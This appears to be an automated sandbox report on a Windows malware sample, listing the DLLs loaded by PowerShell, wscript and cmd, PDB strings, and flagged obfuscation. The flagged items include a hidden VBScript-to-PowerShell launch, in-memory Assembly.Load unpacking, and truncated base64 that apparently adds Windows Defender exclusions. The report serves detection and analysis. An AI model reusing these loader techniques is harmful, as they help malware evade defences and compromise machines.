                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdb9 source: powershell.exe, 00000016.00000002.2783605754.00000000071EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: corlib.pdbX0+ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb= source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Management.Infrastructure.Native.pdb) source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdba0$ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb; source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: gement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2804335664.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdbhP source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbou source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdb source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 364e35\Microsoft.Management.Infrastructure.Native.pdb& source: powershell.exe, 00000016.00000002.2806054422.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: indows\dll\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: re.Native.pdb source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdba source: powershell.exe, 0000000D.00000002.3718811327.0000000008310000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32f source: powershell.exe, 0000001E.00000002.2807890146.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %cqscorlib.pdbC source: powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0T source: powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbZ3 source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2806054422.000000000804C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2793833295.00000000072DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdbev source: powershell.exe, 0000001E.00000002.2743365058.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb) source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ::$DATAgement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0d source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8W source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.0000000008491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb| source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run(""C:\Windows\system32\cmd.exe""/C poWeRSHELL.eXe -EX ", "0")
                  .NET source code contains potential unpacker
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a6c382c.7.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.96e0000.3.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a15e2d4.12.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a6a0b58.8.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a26258c.6.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 30.2.powershell.exe.a419e48.5.raw.unpack, tjjjj.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
